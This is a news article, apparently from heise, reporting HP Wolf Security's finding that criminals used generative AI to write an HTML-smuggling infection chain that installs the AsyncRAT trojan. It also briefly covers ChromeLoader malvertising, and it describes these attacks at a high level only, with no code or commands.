Cybercrime: AI-generated malware spotted in the wild
Security experts from HP point to a worrying trend: criminals are increasingly using generative AI to develop malware.
(Image: Balefire / Shutterstock.com)
The September issue of HP Wolf Security's Threat Insights Report shows that cybercriminals are increasingly using generative AI to develop malware. Until now, the possibility of developing malware using generative AI has mainly been demonstrated in the context of research projects. Criminals had previously used ChatGPT and co. primarily to create phishing campaigns.
In the report, the authors refer to the attachment of an email that had been isolated by the HP Sure Click security solution. The attachment, which was disguised as an invoice, turned out to be an HTML file that requested a password when opened in the browser. The email text was not available to the authors of the report, but probably contained the requested password.
Initial analysis of the code revealed that it was probably an attempt to smuggle in HTML code, i.e. to smuggle in malicious code with the attachment. In contrast to most other attacks of this kind, however, the malicious payload of the HTML file was not encrypted within an archive, but had been implemented AES-encrypted and error-free in the code itself.
In order to decrypt the archive, the security experts first had to crack the password. The decrypted .zip archive contained a Visual Basic script file that starts various processes on the computer and installs the remote access Trojan AsyncRAT on the system. Async-RAT is an open source malware that allows an attacker to take over a computer remotely once it has been installed on the system.
AI lowers entry barriers for cybercrime novices
The criminals apparently used generative AI to develop the infection chain that could have led to the installation of the Trojan. When analyzing the code, the HP security researchers discovered very clear indications of this: every single function was provided with comments and the variable names also indicated that the programs had been written by an AI.
Patrick Schläpfer, one of the security researchers at the HP Security Lab, commented according to CNBC that such uses of generative AI lowered the barriers to entry into cybercrime and allowed newcomers without programming skills to carry out more dangerous attacks.
Videos by heise
However, AI-generated malware is not the only point worth highlighting in the report. So-called ChromeLoader campaigns are also becoming increasingly sophisticated. Malvertising is used to lure Internet users to well-crafted websites where supposed PDF tools are offered for download, in which well-disguised malware is hidden.
(kst)